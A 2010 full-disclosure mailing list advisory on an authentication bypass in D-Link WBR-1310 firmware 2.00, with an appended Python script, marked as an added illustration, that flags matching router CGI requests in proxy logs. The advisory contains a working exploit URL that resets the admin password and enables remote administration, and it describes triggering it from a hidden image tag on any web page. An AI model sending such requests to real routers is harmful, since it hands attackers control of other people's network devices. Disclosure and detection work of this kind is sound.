Message-ID: <AANLkTimmtRA1UTWtLPOkDzvYgV-VgOCeTB7QJmM8iMiE@mail.gmail.com>
Date: Wed, 22 Dec 2010 22:34:02 -0500
From: Craig Heffner <cheffner@...ttys0.com>
To: full-disclosure@...ts.grok.org.uk
Subject: D-Link WBR-1310 Authentication Bypass Vulnerability

The CGI scripts in the WBR-1310 (firmware v.2.00) do not validate
authentication credentials. Administrative settings can be changed by
sending the appropriate HTTP request directly to a CGI script without
authenticating to the device.

The following request will change the administrative password to 'hacked'
and enable remote administration on port 8080:
http://192.168.0.1/tools_admin.cgi?admname=admin&admPass1=hacked&admPass2=hacked&username=user&userPass1=WDB8WvbXdHtZyM8&userPass2=WDB8WvbXdHtZyM8&hip1=*&hport=8080&hEnable=1

Even if remote administration is not enabled, any Web page that any internal
user browses to can change the administrator password and enable remote
administration via a hidden image tag embedded in the Web page. No
JavaScript required.

Newer versions of the WBR-1310 firmware are not vulnerable, but since
version 2.00 is the default firmware, most WBR-1310 routers are still
running it.
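
A detection check for the request pattern this advisory describes, added here as an example and not part of the original post: it flags GET requests to a CGI script on a private address that carry the password or remote-administration parameters from the request above, and marks those whose Referer is another site (the embedded-image case). The log layout, client addresses, Referer values and the names `check_line` and `scan` are assumptions made for the illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names taken from the request shown in the advisory.
SENSITIVE_PARAMS = {"admPass1", "admPass2", "hEnable", "hport"}

# Assumed (constructed) proxy log layout: client "METHOD URL" "REFERER"
LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+)" "([^"]*)"$')

def is_private_host(host):
    """True when host is a literal private (RFC 1918 etc.) IP address."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False

def check_line(line):
    """Return a finding dict for a state-changing GET to a router CGI, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    client, method, url, referer = m.groups()
    target = urlsplit(url)
    if not target.path.endswith(".cgi") or not is_private_host(target.hostname or ""):
        return None
    params = set(parse_qs(target.query, keep_blank_values=True))
    hits = sorted(params & SENSITIVE_PARAMS)
    if method != "GET" or not hits:
        return None
    # A Referer on a different host means another page triggered the request.
    ref_host = urlsplit(referer).hostname if referer != "-" else None
    return {"client": client, "path": target.path, "params": hits,
            "cross_site": ref_host is not None and ref_host != target.hostname,
            "remote_admin": "hEnable" in params}

def scan(lines):
    """Return the findings for every matching line, in input order."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample input; parameter values are placeholders.
SAMPLE_LOG = [
    '192.168.0.23 "GET http://192.168.0.1/tools_admin.cgi?admname=admin'
    '&admPass1=x&admPass2=x&hport=8080&hEnable=1" "http://forum.example/thread/17"',
    '192.168.0.10 "GET http://192.168.0.1/tools_admin.cgi?admname=admin'
    '&admPass1=y&admPass2=y" "http://192.168.0.1/"',
    '192.168.0.23 "GET http://www.example.com/index.cgi?q=router" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
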
